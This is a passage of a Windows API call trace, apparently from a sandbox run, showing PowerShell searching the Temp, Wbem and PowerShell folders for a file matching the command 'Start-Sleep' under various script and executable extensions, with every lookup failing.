ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0225.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x28 [0225.691] GetFullPathNameW (in: lpFileName="Start-Sleep.JSE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpFilePart=0x0) returned 0x34 [0225.691] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.JSE", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.691] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.692] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.JSE", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.692] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.692] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0225.693] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSF", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.693] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.694] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.WSF", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.695] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.695] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.WSH", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.695] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.696] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.WSH", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.696] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x28 [0225.736] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.736] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.737] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.MSC", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.738] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.738] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.739] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep.CPL", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.740] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.740] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.740] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.741] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Start-Sleep", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.742] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.742] GetFullPathNameW (in: lpFileName="Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x34 [0225.742] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.743] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.744] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.ps1", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.744] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.744] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.745] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.746] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.psm1", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.746] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.746] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0225.747] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.747] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x3b [0225.747] GetFullPathNameW (in: lpFileName="Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x35 [0225.747] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.747] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.748] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.psd1", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.748] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.748] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0225.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.748] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.COM", lpFilePart=0x0) returned 0x3a [0225.749] GetFullPathNameW (in: lpFileName="Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpFilePart=0x0) returned 0x34 [0225.749] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.749] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.750] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.COM", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.750] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0225.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x3a [0225.751] GetFullPathNameW (in: lpFileName="Start-Sleep.EXE", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpFilePart=0x0) returned 0x34 [0225.751] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.751] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.752] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.EXE", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.752] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0225.752] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.752] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x3a [0225.752] GetFullPathNameW (in: lpFileName="Start-Sleep.BAT", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpFilePart=0x0) returned 0x34 [0225.753] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.753] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.804] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.BAT", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0225.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe7a0) returned 1 [0225.806] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe740) returned 1 [0225.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.806] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe750) returned 1 [0225.806] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe830 | out: lpFileInformation=0x1b7fe830*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0225.807] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe710) returned 1 [0225.807] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe780) returned 1 [0225.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1b7fe270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0225.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x3a [0225.807] GetFullPathNameW (in: lpFileName="Start-Sleep.CMD", nBufferLength=0x105, lpBuffer=0x1b7fe210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpFilePart=0x0) returned 0x34 [0225.807] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpszLongPath=0x1b7fe1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0225.807] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7fe160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0225.809] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Start-Sleep.CMD", lpFindFileData=0x1b7fe420 | out: lpFindFileData=0x1b7fe420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, 